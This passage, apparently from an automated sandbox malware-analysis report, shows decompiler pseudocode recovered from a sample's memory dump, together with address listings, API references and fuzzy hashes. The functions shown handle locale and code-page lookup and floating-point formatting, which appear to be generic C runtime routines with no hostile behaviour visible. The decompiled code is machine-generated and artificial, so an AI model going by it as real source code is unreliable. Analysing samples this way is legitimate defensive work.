								_t120 =  *(E00A041D0(_t97, _t114) + 0x34c);
								_t127 = E00A0EA48(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E00A0B1C4(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E00A0EB7A(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t88);
								return E009F8F7D(_t62, _t88, _v32 ^ _t130, _t114, _t121, _t128);
							} else {
								if(E00A06539(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E00A06539(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E00A1394B(_t97);
										_t97 = _t86;
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E00A06539(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E00A1394B(_t97);
											_t97 = _t86;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E00A122DE(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E00A0B4B3(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}















































                                                                                                                                                                          0x00a0e312
                                                                                                                                                                          0x00a0e313
                                                                                                                                                                          0x00a0e315
                                                                                                                                                                          0x00a0e31a
                                                                                                                                                                          0x00a0e321
                                                                                                                                                                          0x00a0e323
                                                                                                                                                                          0x00a0e326
                                                                                                                                                                          0x00a0e326
                                                                                                                                                                          0x00a0e329
                                                                                                                                                                          0x00a0e329
                                                                                                                                                                          0x00a0e32f
                                                                                                                                                                          0x00a0e332
                                                                                                                                                                          0x00a0e335
                                                                                                                                                                          0x00a0e335
                                                                                                                                                                          0x00a0e338
                                                                                                                                                                          0x00a0e33b
                                                                                                                                                                          0x00a0e33d
                                                                                                                                                                          0x00a0e343
                                                                                                                                                                          0x00a0e345
                                                                                                                                                                          0x00a0e34a
                                                                                                                                                                          0x00a0e354
                                                                                                                                                                          0x00a0e359
                                                                                                                                                                          0x00a0e35b
                                                                                                                                                                          0x00a0e35e
                                                                                                                                                                          0x00a0e35e
                                                                                                                                                                          0x00a0e360
                                                                                                                                                                          0x00a0e364
                                                                                                                                                                          0x00a0e3ad
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e366
                                                                                                                                                                          0x00a0e36b
                                                                                                                                                                          0x00a0e374
                                                                                                                                                                          0x00a0e36d
                                                                                                                                                                          0x00a0e36d
                                                                                                                                                                          0x00a0e36d
                                                                                                                                                                          0x00a0e37f
                                                                                                                                                                          0x00a0e389
                                                                                                                                                                          0x00a0e38e
                                                                                                                                                                          0x00a0e393
                                                                                                                                                                          0x00a0e399
                                                                                                                                                                          0x00a0e39d
                                                                                                                                                                          0x00a0e3a6
                                                                                                                                                                          0x00a0e39f
                                                                                                                                                                          0x00a0e39f
                                                                                                                                                                          0x00a0e39f
                                                                                                                                                                          0x00a0e3b2
                                                                                                                                                                          0x00a0e3b2
                                                                                                                                                                          0x00a0e393
                                                                                                                                                                          0x00a0e37f
                                                                                                                                                                          0x00a0e3b8
                                                                                                                                                                          0x00a0e4f4
                                                                                                                                                                          0x00a0e4f4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e3be
                                                                                                                                                                          0x00a0e3be
                                                                                                                                                                          0x00a0e3c7
                                                                                                                                                                          0x00a0e3d8
                                                                                                                                                                          0x00a0e3ce
                                                                                                                                                                          0x00a0e3ce
                                                                                                                                                                          0x00a0e3ce
                                                                                                                                                                          0x00a0e3df
                                                                                                                                                                          0x00a0e3e3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e407
                                                                                                                                                                          0x00a0e407
                                                                                                                                                                          0x00a0e40c
                                                                                                                                                                          0x00a0e40e
                                                                                                                                                                          0x00a0e40e
                                                                                                                                                                          0x00a0e410
                                                                                                                                                                          0x00a0e415
                                                                                                                                                                          0x00a0e4ef
                                                                                                                                                                          0x00a0e4f1
                                                                                                                                                                          0x00a0e4f6
                                                                                                                                                                          0x00a0e4fa
                                                                                                                                                                          0x00a0e41b
                                                                                                                                                                          0x00a0e41b
                                                                                                                                                                          0x00a0e41e
                                                                                                                                                                          0x00a0e41e
                                                                                                                                                                          0x00a0e426
                                                                                                                                                                          0x00a0e429
                                                                                                                                                                          0x00a0e429
                                                                                                                                                                          0x00a0e42c
                                                                                                                                                                          0x00a0e42c
                                                                                                                                                                          0x00a0e42f
                                                                                                                                                                          0x00a0e432
                                                                                                                                                                          0x00a0e43c
                                                                                                                                                                          0x00a0e446
                                                                                                                                                                          0x00a0e44b
                                                                                                                                                                          0x00a0e450
                                                                                                                                                                          0x00a0e4fb
                                                                                                                                                                          0x00a0e4fd
                                                                                                                                                                          0x00a0e4fe
                                                                                                                                                                          0x00a0e4ff
                                                                                                                                                                          0x00a0e500
                                                                                                                                                                          0x00a0e501
                                                                                                                                                                          0x00a0e502
                                                                                                                                                                          0x00a0e507
                                                                                                                                                                          0x00a0e50b
                                                                                                                                                                          0x00a0e513
                                                                                                                                                                          0x00a0e51a
                                                                                                                                                                          0x00a0e51d
                                                                                                                                                                          0x00a0e51e
                                                                                                                                                                          0x00a0e522
                                                                                                                                                                          0x00a0e523
                                                                                                                                                                          0x00a0e528
                                                                                                                                                                          0x00a0e530
                                                                                                                                                                          0x00a0e53f
                                                                                                                                                                          0x00a0e54b
                                                                                                                                                                          0x00a0e55c
                                                                                                                                                                          0x00a0e564
                                                                                                                                                                          0x00a0e57e
                                                                                                                                                                          0x00a0e58b
                                                                                                                                                                          0x00a0e58e
                                                                                                                                                                          0x00a0e591
                                                                                                                                                                          0x00a0e591
                                                                                                                                                                          0x00a0e59b
                                                                                                                                                                          0x00a0e566
                                                                                                                                                                          0x00a0e566
                                                                                                                                                                          0x00a0e568
                                                                                                                                                                          0x00a0e568
                                                                                                                                                                          0x00a0e5a1
                                                                                                                                                                          0x00a0e5a2
                                                                                                                                                                          0x00a0e5a5
                                                                                                                                                                          0x00a0e5ac
                                                                                                                                                                          0x00a0e456
                                                                                                                                                                          0x00a0e466
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e46c
                                                                                                                                                                          0x00a0e46e
                                                                                                                                                                          0x00a0e46e
                                                                                                                                                                          0x00a0e47a
                                                                                                                                                                          0x00a0e488
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e48a
                                                                                                                                                                          0x00a0e48a
                                                                                                                                                                          0x00a0e48d
                                                                                                                                                                          0x00a0e493
                                                                                                                                                                          0x00a0e496
                                                                                                                                                                          0x00a0e4a6
                                                                                                                                                                          0x00a0e4ab
                                                                                                                                                                          0x00a0e4b9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e498
                                                                                                                                                                          0x00a0e498
                                                                                                                                                                          0x00a0e49b
                                                                                                                                                                          0x00a0e4a1
                                                                                                                                                                          0x00a0e4a4
                                                                                                                                                                          0x00a0e4bb
                                                                                                                                                                          0x00a0e4bb
                                                                                                                                                                          0x00a0e4c7
                                                                                                                                                                          0x00a0e4e7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e4c9
                                                                                                                                                                          0x00a0e4c9
                                                                                                                                                                          0x00a0e4d3
                                                                                                                                                                          0x00a0e4d8
                                                                                                                                                                          0x00a0e4dd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e4df
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e4df
                                                                                                                                                                          0x00a0e4dd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e4a4
                                                                                                                                                                          0x00a0e496
                                                                                                                                                                          0x00a0e488
                                                                                                                                                                          0x00a0e466
                                                                                                                                                                          0x00a0e450
                                                                                                                                                                          0x00a0e415
                                                                                                                                                                          0x00a0e3e3

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A041D0: GetLastError.KERNEL32(?,00000000,?,009FD25E,00000000,00000000,?,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A041D5
                                                                                                                                                                            • Part of subcall function 00A041D0: SetLastError.KERNEL32(00000000,00000002,000000FF,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A04273
                                                                                                                                                                          • GetACP.KERNEL32(?,?,?,?,?,?,00A02029,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00A0E3CE
                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00A02029,?,?,?,00000055,?,-00000050,?,?), ref: 00A0E3F9
                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 00A0E48D
                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 00A0E49B
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00A0E55C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                          • String ID: utf8
                                                                                                                                                                          • API String ID: 4147378913-905460609
                                                                                                                                                                          • Opcode ID: 03c507f126c1fda5d340077506dfd1cbc3317a27eb495df8034a8ec310f6a1f6
                                                                                                                                                                          • Instruction ID: 595f9c26ae3a6c8a47379599523edfcff3a9d2eabdd47b8e7488ea76ccbe2b61
                                                                                                                                                                          • Opcode Fuzzy Hash: 03c507f126c1fda5d340077506dfd1cbc3317a27eb495df8034a8ec310f6a1f6
                                                                                                                                                                          • Instruction Fuzzy Hash: 2271277160020AAADB24EB34FD42BAB77A8EF48B00F144829F905DB1C1EB76E950D761
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0F83A Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427COMMONCrypto
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                          			E00A0F83A(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v464;
				void _v468;
				signed int _v472;
				char _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				intOrPtr _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1928;
				char _v1932;
				signed int _v1940;
				signed int _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2436;
				signed int _t797;
				intOrPtr _t807;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t826;
				signed int _t832;
				signed int _t834;
				signed int _t841;
				void* _t845;
				signed int _t846;
				intOrPtr _t852;
				void* _t853;
				signed int _t859;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t869;
				signed int _t871;
				signed int _t873;
				signed int _t874;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t883;
				signed int _t886;
				signed int _t889;
				signed int _t895;
				signed int _t896;
				signed int _t904;
				signed int _t907;
				signed int _t912;
				char* _t915;
				signed int _t919;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				char* _t934;
				signed char _t937;
				signed int _t943;
				signed int _t945;
				signed int _t949;
				signed int _t952;
				signed int _t960;
				signed int _t963;
				signed int _t965;
				signed int _t968;
				signed int _t977;
				signed int _t978;
				signed int _t981;
				signed int _t994;
				signed int _t995;
				signed int _t996;
				signed int _t997;
				signed int* _t998;
				signed char _t1001;
				signed int* _t1004;
				signed int _t1007;
				signed int _t1009;
				signed int _t1013;
				signed int _t1016;
				signed int _t1024;
				signed int _t1027;
				signed int _t1030;
				signed int _t1033;
				signed int _t1042;
				intOrPtr _t1047;
				signed int _t1048;
				signed int _t1054;
				void* _t1062;
				signed int _t1063;
				signed int _t1064;
				signed int _t1065;
				signed int _t1068;
				signed int _t1076;
				signed int _t1080;
				signed int _t1082;
				signed int _t1087;
				void* _t1093;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1099;
				signed int _t1104;
				signed int _t1105;
				signed int _t1109;
				signed int _t1111;
				signed int _t1116;
				signed char _t1123;
				void* _t1124;
				signed int _t1129;
				intOrPtr* _t1136;
				signed int _t1140;
				signed int _t1147;
				signed int _t1148;
				void* _t1150;
				signed int _t1153;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1160;
				signed int _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1168;
				signed int _t1169;
				signed int _t1170;
				signed int _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1177;
				signed int _t1178;
				signed int _t1179;
				signed int _t1181;
				signed int _t1182;
				unsigned int _t1183;
				unsigned int _t1187;
				unsigned int _t1190;
				signed int _t1191;
				signed int _t1194;
				signed int* _t1197;
				signed int _t1200;
				void* _t1202;
				unsigned int _t1203;
				signed int _t1204;
				signed int _t1207;
				signed int* _t1210;
				signed int _t1213;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				signed int _t1222;
				signed int _t1227;
				signed int _t1228;
				signed int _t1230;
				signed int _t1231;
				signed int _t1232;
				signed int _t1233;
				signed int _t1234;
				signed int _t1235;
				signed int _t1236;
				signed int _t1238;
				signed int _t1240;
				signed int _t1241;
				signed int _t1242;
				signed int _t1243;
				signed int _t1244;
				signed int _t1246;
				void* _t1247;
				signed int _t1248;
				signed int _t1250;
				signed int _t1255;
				void* _t1259;
				intOrPtr _t1260;
				void* _t1261;
				void* _t1264;
				unsigned int _t1267;
				signed int _t1268;
				signed int _t1269;
				signed int _t1270;
				signed int _t1271;
				signed int _t1272;
				signed int _t1273;
				signed int _t1276;
				signed int _t1277;
				signed int _t1278;
				signed int _t1279;
				signed int _t1282;
				signed int _t1283;
				signed int _t1284;
				void* _t1285;
				void* _t1288;
				signed int _t1290;
				signed int _t1294;
				signed int _t1296;
				signed int _t1300;
				void* _t1301;
				signed int _t1302;
				void* _t1303;
				signed int _t1305;
				signed int _t1306;
				signed int _t1308;
				void* _t1311;
				signed int _t1313;
				signed int _t1314;
				signed int _t1316;
				signed int _t1317;
				signed int _t1319;
				signed int _t1326;
				void* _t1328;
				signed int* _t1329;
				signed int* _t1331;
				signed int _t1334;
				signed int _t1343;

				_t1301 = __esi;
				_t1259 = __edi;
				_t1216 = __edx;
				_t797 =  *0xa44bac; // 0x96877b9b
				_v8 = _t797 ^ _t1326;
				_v1928 = _a16;
				_v1896 = _a20;
				_push(__ebx);
				E00A12659(__eflags,  &_v1940);
				_t1123 = 1;
				if((_v1940 & 0x0000001f) != 0x1f) {
					E00A126C1(__eflags,  &_v1940);
					_v1932 = 1;
				} else {
					_v1932 = 0;
				}
				_push(_t1301);
				_t1302 = _a8;
				_push(_t1259);
				_t1260 = 0x20;
				_t1334 = _t1302;
				if(_t1334 > 0 || _t1334 >= 0 && _a4 >= 0) {
					_t807 = _t1260;
				} else {
					_t807 = 0x2d;
				}
				_t1136 = _v1928;
				 *_t1136 = _t807;
				 *((intOrPtr*)(_t1136 + 8)) = _v1896;
				E00A03468( &_v1944, 0, 0);
				_t1329 = _t1328 + 0xc;
				if((_t1302 & 0x7ff00000) != 0) {
					L14:
					_t814 = E00A051A8( &_a4);
					_pop(_t1139);
					__eflags = _t814;
					if(_t814 != 0) {
						_t1139 = _v1928;
						 *((intOrPtr*)(_v1928 + 4)) = _t1123;
					}
					_t815 = _t814 - 1;
					__eflags = _t815;
					if(_t815 == 0) {
						_t816 = E00A03503(_v1896, _a24, "1#INF");
						__eflags = _t816;
						if(_t816 != 0) {
							goto L311;
						} else {
							_t1123 = 0;
							__eflags = 0;
							goto L308;
						}
					} else {
						_t832 = _t815 - 1;
						__eflags = _t832;
						if(_t832 == 0) {
							_push("1#QNAN");
							goto L12;
						} else {
							_t834 = _t832 - 1;
							__eflags = _t834;
							if(_t834 == 0) {
								_push("1#SNAN");
								goto L12;
							} else {
								__eflags = _t834 == 1;
								if(_t834 == 1) {
									_push("1#IND");
									goto L12;
								} else {
									_v1920 = _v1920 & 0x00000000;
									_a8 = _t1302 & 0x7fffffff;
									_t1343 = _a4;
									asm("fst qword [ebp-0x75c]");
									_t1305 = _v1884;
									_v1916 = _a12 + 1;
									_t1147 = _t1305 >> 0x14;
									_t841 = _t1147 & 0x000007ff;
									__eflags = _t841;
									if(_t841 != 0) {
										_t841 = 0;
										_t1217 = 0x100000;
										_t39 =  &_v1876;
										 *_t39 = _v1876 & 0;
										__eflags =  *_t39;
									} else {
										_t1217 = 0;
										_v1876 = _t1123;
									}
									_t1306 = _t1305 & 0x000fffff;
									_v1912 = _v1888 + _t841;
									asm("adc esi, edx");
									_t1148 = _t1147 & 0x000007ff;
									_v1868 = _v1876 + _t1148;
									E00A12710(_t1148, _t1343);
									_push(_t1148);
									 *_t1329 = _t1343;
									_t845 = E00A12820(_t1148);
									_t1150 = _t1148;
									_t846 = L00A13650(_t845, _t1123, _t1150, _t1217);
									_v1904 = _t846;
									_t1264 = 0x20;
									__eflags = _t846 - 0x7fffffff;
									if(_t846 == 0x7fffffff) {
										L25:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t846 - 0x80000000;
										if(_t846 == 0x80000000) {
											goto L25;
										}
									}
									_t1218 = _v1868;
									__eflags = _t1306;
									_v468 = _v1912;
									_v464 = _t1306;
									_t1153 = (0 | _t1306 != 0x00000000) + 1;
									_v1892 = _t1153;
									_v472 = _t1153;
									__eflags = _t1218 - 0x433;
									if(_t1218 < 0x433) {
										__eflags = _t1218 - 0x35;
										if(_t1218 == 0x35) {
											L96:
											__eflags = _t1306;
											_t209 =  &_v1884;
											 *_t209 = _v1884 & 0x00000000;
											__eflags =  *_t209;
											_t852 =  *((intOrPtr*)(_t1326 + 4 + (0 | _t1306 != 0x00000000) * 4 - 0x1d4));
											asm("bsr eax, eax");
											if( *_t209 == 0) {
												_t853 = 0;
												__eflags = 0;
											} else {
												_t853 = _t852 + 1;
											}
											__eflags = _t1264 - _t853 - _t1123;
											asm("sbb esi, esi");
											_t1308 =  ~_t1306 + _t1153;
											__eflags = _t1308 - 0x73;
											if(_t1308 <= 0x73) {
												_t1219 = _t1308 - 1;
												__eflags = _t1219 - 0xffffffff;
												if(_t1219 != 0xffffffff) {
													_t1285 = _t1219 - 1;
													while(1) {
														__eflags = _t1219 - _t1153;
														if(_t1219 >= _t1153) {
															_t1042 = 0;
															__eflags = 0;
														} else {
															_t1042 =  *(_t1326 + _t1219 * 4 - 0x1d0);
														}
														__eflags = _t1285 - _t1153;
														if(_t1285 >= _t1153) {
															_t1183 = 0;
															__eflags = 0;
														} else {
															_t1183 =  *(_t1326 + _t1219 * 4 - 0x1d4);
														}
														 *(_t1326 + _t1219 * 4 - 0x1d0) = _t1183 >> 0x0000001f | _t1042 + _t1042;
														_t1219 = _t1219 - 1;
														_t1285 = _t1285 - 1;
														__eflags = _t1219 - 0xffffffff;
														if(_t1219 == 0xffffffff) {
															goto L111;
														}
														_t1153 = _v472;
													}
												}
												L111:
												_v472 = _t1308;
											} else {
												_v1400 = _v1400 & 0x00000000;
												_v472 = _v472 & 0x00000000;
												E009FF705( &_v468, 0x1cc,  &_v1396, 0);
												_t1329 =  &(_t1329[4]);
											}
											_t1267 = 0x434 >> 5;
											E009FA270(0x434 >> 5,  &_v1396, 0, 0x434);
											__eflags = 1;
											 *(_t1326 + 0xbad63d) = 1 << (0x00000434 - _v1868 & 0x0000001f);
										} else {
											_v1396 = _v1396 & 0x00000000;
											_v1392 = 0x100000;
											_v1400 = 2;
											__eflags = _t1306;
											if(_t1306 != 0) {
												_t1247 = 0;
												__eflags = 0;
												while(1) {
													_t1047 =  *((intOrPtr*)(_t1326 + _t1247 - 0x570));
													__eflags = _t1047 -  *((intOrPtr*)(_t1326 + _t1247 - 0x1d0));
													if(_t1047 !=  *((intOrPtr*)(_t1326 + _t1247 - 0x1d0))) {
														goto L96;
													}
													_t1247 = _t1247 + 4;
													__eflags = _t1247 - 8;
													if(_t1247 != 8) {
														continue;
													} else {
														__eflags = 0;
														asm("bsr eax, esi");
														_v1884 = 0;
														if(0 == 0) {
															_t1048 = 0;
														} else {
															_t1048 = _t1047 + 1;
														}
														__eflags = _t1264 - _t1048 - 2;
														asm("sbb esi, esi");
														_t1319 =  ~_t1306 + _t1153;
														__eflags = _t1319 - 0x73;
														if(_t1319 <= 0x73) {
															_t1248 = _t1319 - 1;
															__eflags = _t1248 - 0xffffffff;
															if(_t1248 != 0xffffffff) {
																_t1288 = _t1248 - 1;
																while(1) {
																	__eflags = _t1248 - _t1153;
																	if(_t1248 >= _t1153) {
																		_t1054 = 0;
																	} else {
																		_t1054 =  *(_t1326 + _t1248 * 4 - 0x1d0);
																	}
																	__eflags = _t1288 - _t1153;
																	if(_t1288 >= _t1153) {
																		_t1187 = 0;
																	} else {
																		_t1187 =  *(_t1326 + _t1248 * 4 - 0x1d4);
																	}
																	 *(_t1326 + _t1248 * 4 - 0x1d0) = _t1187 >> 0x0000001e | _t1054 << 0x00000002;
																	_t1248 = _t1248 - 1;
																	_t1288 = _t1288 - 1;
																	__eflags = _t1248 - 0xffffffff;
																	if(_t1248 == 0xffffffff) {
																		goto L94;
																	}
																	_t1153 = _v472;
																}
															}
															L94:
															_v472 = _t1319;
														} else {
															_v1400 = 0;
															_v472 = 0;
															E009FF705( &_v468, 0x1cc,  &_v1396, 0);
															_t1329 =  &(_t1329[4]);
														}
														_t1267 = 0x435 >> 5;
														E009FA270(0x435 >> 5,  &_v1396, 0, 0x435);
														 *(_t1326 + 0xbad63d) = 1 << (0x00000435 - _v1868 & 0x0000001f);
													}
													goto L113;
												}
											}
											goto L96;
										}
										L113:
										_t859 = _t1267 + 1;
										_t1311 = 0x1cc;
										_v1400 = _t859;
										_v936 = _t859;
										E009FF705( &_v932, 0x1cc,  &_v1396, _t859 << 2);
										_t1331 =  &(_t1329[7]);
										_t1123 = 1;
										__eflags = 1;
									} else {
										_v1396 = _v1396 & 0x00000000;
										_v1392 = 0x100000;
										_v1400 = 2;
										__eflags = _t1306;
										if(_t1306 == 0) {
											L53:
											_t1190 = _t1218 - 0x432;
											_t1191 = _t1190 & 0x0000001f;
											_v1900 = _t1190 >> 5;
											_v1876 = _t1191;
											_v1920 = _t1264 - _t1191;
											_t1062 = E00A13480(_t1123, _t1264 - _t1191, 0);
											_t1250 = _v1892;
											_t1063 = _t1062 - 1;
											_t128 =  &_v1872;
											 *_t128 = _v1872 & 0x00000000;
											__eflags =  *_t128;
											_v1912 = _t1063;
											_t1064 =  !_t1063;
											_v1884 = _t1064;
											asm("bsr eax, ecx");
											if( *_t128 == 0) {
												_t136 =  &_v1880;
												 *_t136 = _v1880 & 0x00000000;
												__eflags =  *_t136;
											} else {
												_v1880 = _t1064 + 1;
											}
											_t1194 = _v1900;
											_t1311 = 0x1cc;
											_t1065 = _t1250 + _t1194;
											__eflags = _t1065 - 0x73;
											if(_t1065 <= 0x73) {
												__eflags = _t1264 - _v1880 - _v1876;
												asm("sbb eax, eax");
												_t1068 =  ~_t1065 + _t1250 + _t1194;
												_v1908 = _t1068;
												__eflags = _t1068 - 0x73;
												if(_t1068 > 0x73) {
													goto L57;
												} else {
													_t1290 = _t1194 - 1;
													_t1076 = _t1068 - 1;
													_v1872 = _t1290;
													_v1868 = _t1076;
													__eflags = _t1076 - _t1290;
													if(_t1076 != _t1290) {
														_t1294 = _t1076 - _t1194;
														__eflags = _t1294;
														_t1197 =  &(( &_v472)[_t1294]);
														_v1892 = _t1197;
														while(1) {
															__eflags = _t1294 - _t1250;
															if(_t1294 >= _t1250) {
																_t1080 = 0;
																__eflags = 0;
															} else {
																_t1080 = _t1197[1];
															}
															_v1880 = _t1080;
															_t156 = _t1294 - 1; // -4
															__eflags = _t156 - _t1250;
															if(_t156 >= _t1250) {
																_t1082 = 0;
																__eflags = 0;
															} else {
																_t1082 =  *_t1197;
															}
															_t1200 = _v1868;
															 *(_t1326 + _t1200 * 4 - 0x1d0) = (_t1082 & _v1884) >> _v1920 | (_v1880 & _v1912) << _v1876;
															_t1087 = _t1200 - 1;
															_t1197 = _v1892 - 4;
															_v1868 = _t1087;
															_t1294 = _t1294 - 1;
															_v1892 = _t1197;
															__eflags = _t1087 - _v1872;
															if(_t1087 == _v1872) {
																break;
															}
															_t1250 = _v472;
														}
														_t1194 = _v1900;
													}
													__eflags = _t1194;
													if(_t1194 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1194 << 2);
														_t1329 =  &(_t1329[3]);
													}
													_v472 = _v1908;
												}
											} else {
												L57:
												_v1400 = 0;
												_v472 = 0;
												E009FF705( &_v468, _t1311,  &_v1396, 0);
												_t1329 =  &(_t1329[4]);
											}
											_v1396 = 2;
											_push(4);
										} else {
											_t1202 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1326 + _t1202 - 0x570)) -  *((intOrPtr*)(_t1326 + _t1202 - 0x1d0));
												if( *((intOrPtr*)(_t1326 + _t1202 - 0x570)) !=  *((intOrPtr*)(_t1326 + _t1202 - 0x1d0))) {
													goto L53;
												}
												_t1202 = _t1202 + 4;
												__eflags = _t1202 - 8;
												if(_t1202 != 8) {
													continue;
												} else {
													_t1203 = _t1218 - 0x431;
													_t1204 = _t1203 & 0x0000001f;
													_v1880 = _t1203 >> 5;
													_v1900 = _t1204;
													_v1872 = _t1264 - _t1204;
													_t1093 = E00A13480(_t1123, _t1264 - _t1204, 0);
													_t1255 = _v1892;
													_t1094 = _t1093 - 1;
													_t68 =  &_v1884;
													 *_t68 = _v1884 & 0x00000000;
													__eflags =  *_t68;
													_v1908 = _t1094;
													_t1095 =  !_t1094;
													_v1912 = _t1095;
													asm("bsr eax, ecx");
													if( *_t68 == 0) {
														_t76 =  &_v1876;
														 *_t76 = _v1876 & 0x00000000;
														__eflags =  *_t76;
													} else {
														_v1876 = _t1095 + 1;
													}
													_t1207 = _v1880;
													_t1311 = 0x1cc;
													_t1096 = _t1255 + _t1207;
													__eflags = _t1096 - 0x73;
													if(_t1096 <= 0x73) {
														__eflags = _t1264 - _v1876 - _v1900;
														asm("sbb eax, eax");
														_t1099 =  ~_t1096 + _t1255 + _t1207;
														_v1884 = _t1099;
														__eflags = _t1099 - 0x73;
														if(_t1099 > 0x73) {
															goto L35;
														} else {
															_t1296 = _t1207 - 1;
															_t1105 = _t1099 - 1;
															_v1920 = _t1296;
															_v1868 = _t1105;
															__eflags = _t1105 - _t1296;
															if(_t1105 != _t1296) {
																_t1300 = _t1105 - _t1207;
																__eflags = _t1300;
																_t1210 =  &(( &_v472)[_t1300]);
																_v1892 = _t1210;
																while(1) {
																	__eflags = _t1300 - _t1255;
																	if(_t1300 >= _t1255) {
																		_t1109 = 0;
																		__eflags = 0;
																	} else {
																		_t1109 = _t1210[1];
																	}
																	_v1876 = _t1109;
																	_t96 = _t1300 - 1; // -4
																	__eflags = _t96 - _t1255;
																	if(_t96 >= _t1255) {
																		_t1111 = 0;
																		__eflags = 0;
																	} else {
																		_t1111 =  *_t1210;
																	}
																	_t1213 = _v1868;
																	 *(_t1326 + _t1213 * 4 - 0x1d0) = (_t1111 & _v1912) >> _v1872 | (_v1876 & _v1908) << _v1900;
																	_t1116 = _t1213 - 1;
																	_t1210 = _v1892 - 4;
																	_v1868 = _t1116;
																	_t1300 = _t1300 - 1;
																	_v1892 = _t1210;
																	__eflags = _t1116 - _v1920;
																	if(_t1116 == _v1920) {
																		break;
																	}
																	_t1255 = _v472;
																}
																_t1207 = _v1880;
															}
															__eflags = _t1207;
															if(_t1207 != 0) {
